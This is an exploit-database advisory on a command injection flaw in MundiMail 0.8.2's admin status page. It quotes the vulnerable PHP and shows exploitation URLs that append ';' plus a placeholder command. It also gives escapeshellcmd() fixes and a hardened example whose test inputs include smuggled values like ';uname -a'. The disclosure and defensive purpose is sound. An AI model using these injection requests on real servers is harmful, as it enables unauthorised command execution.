MundiMail 0.8.2 - Remote Code Execution

EDB-ID: 10287
CVE: N/A
Author: Dedalo
Type: webapps
Platform: PHP
Date: 2009-09-07

# Reference: http://www.ccat.edu.mx/advisors/advisor5/advisor5.html
# Credits: Ccat Research Labs - México - Coatepec, Ver. www.ccat.edu.mx

# Software Link: http://sourceforge.net/projects/mundimail/
# Tested on: Debian, Centos & Windows Server 2000

Preview:

Two handlers in /admin/status/index.php pass the request parameters mypid and idtag straight into system() and exec() without any validation or escaping. Because both calls go through a shell, a request that appends shell metacharacters to either parameter runs arbitrary commands with the privileges of the web server user.


1.- First Vulnerable Code

//need to kill daemon
$cmd = "/bin/kill";
$cmd .= " " . $_REQUEST["mypid"];   // attacker-controlled, never validated
system($cmd);                       // runs through /bin/sh: ';', '|', '&' are interpreted

2.- Exploitation

/admin/status/index.php?mypid=%3Bcommand

%3B is a URL-encoded ';'. It terminates the /bin/kill invocation, and whatever follows runs as a second command under the web server user.


3.- Fix


$cmd .= " " . escapeshellcmd($_REQUEST["mypid"]);

4.- Second Vulnerable Code

$cmd = ROOTDIR . "include/massmail.php";
$cmd .= ' ' . $_REQUEST["idtag"];   // attacker-controlled, never validated
$cmd .= ' > /dev/null';
$cmd .= ' &';
echo $cmd . "<br>\n";               // the built command line is even shown to the client
exec($cmd);                         // shell-interpreted, output discarded
$mid = "../mail/success.php";

5.- Exploitation

/admin/status/index.php?idtag=%3Bcommand

Same technique as above. Note that this one is blind: the injected command's output goes to /dev/null and exec()'s return value is never displayed, so only the echoed command line, not the result, comes back to the client.


6.- Fix

$cmd .= ' ' . escapeshellcmd($_REQUEST["idtag"]);


7.- Other

Other fixes are possible for this bug; escapeshellcmd() is just the easiest one-line patch ;) Bear in mind that escapeshellcmd() escapes shell metacharacters but does not quote the value, so whitespace-separated extra arguments (for example "-9 1") still reach /bin/kill. escapeshellarg() on the single argument, or rejecting anything that is not a numeric PID or an identifier-shaped tag, is the stricter option.
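As an added example (not MundiMail's own code, and not the one-line fixes in sections 3 and 6), the following PHP hardens both sinks the way a reviewer would ask for: validate the shape of mypid and idtag first, then avoid the shell where possible (posix_kill()) or quote the single argument with escapeshellarg(). The request parameter names come from the advisory; that massmail.php is run through the php binary, and the PID range used, are assumptions.

```php
<?php
// Added example (not MundiMail's own code): hardened replacements for the two
// sinks quoted above. Assumes the same request parameters, mypid and idtag,
// and that massmail.php is a PHP script to be run through the php binary.

// Accept only a decimal PID in a sane range; anything else is rejected, not escaped.
function safe_pid(string $raw): ?int {
    if (!ctype_digit($raw)) {
        return null;
    }
    $pid = (int) $raw;
    // 0 and 1 are never a daemon this app started; 4194304 is Linux's pid_max ceiling (assumed).
    return ($pid >= 2 && $pid <= 4194304) ? $pid : null;
}

// Accept only an identifier-shaped tag (letters, digits, '_' and '-', up to 64 chars).
function safe_idtag(string $raw): ?string {
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $raw) === 1 ? $raw : null;
}

// First sink: stop the daemon. posix_kill() needs no shell at all.
function kill_daemon(string $raw): bool {
    $pid = safe_pid($raw);
    if ($pid === null) {
        return false;
    }
    if (function_exists('posix_kill')) {
        return posix_kill($pid, 15); // 15 = SIGTERM
    }
    // Without the posix extension, fall back to /bin/kill. escapeshellarg() wraps
    // the value in single quotes, so neither metacharacters nor a second
    // argument (e.g. "-9 1") can be smuggled in.
    exec('/bin/kill ' . escapeshellarg((string) $pid), $output, $status);
    return $status === 0;
}

// Second sink: launch the mass mailer in the background.
function start_massmail(string $raw, string $rootdir): bool {
    $idtag = safe_idtag($raw);
    if ($idtag === null) {
        return false;
    }
    $cmd = escapeshellarg(PHP_BINARY) . ' '
         . escapeshellarg($rootdir . 'include/massmail.php') . ' '
         . escapeshellarg($idtag) . ' > /dev/null 2>&1 &';
    exec($cmd, $output, $status);
    return $status === 0;
}

// Constructed inputs: the legitimate values pass, the advisory-style payloads are rejected.
var_dump(safe_pid('4242'));
var_dump(safe_pid('4242;id'));
var_dump(safe_pid('-9 1'));
var_dump(safe_idtag('campaign_07'));
var_dump(safe_idtag(';uname -a'));
```

The point is the order of operations: reject anything that is not the expected shape first, then quote whatever is left with escapeshellarg() (or skip the shell entirely). escapeshellcmd() over the whole command line, as in the quick fixes above, neutralises ';' and '|' but leaves spaces alone, so an injected extra argument still reaches the binary.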


8.- Greetz

www[dot]seguridadblanca[dot]com


--------------
Happy Hacking
--------------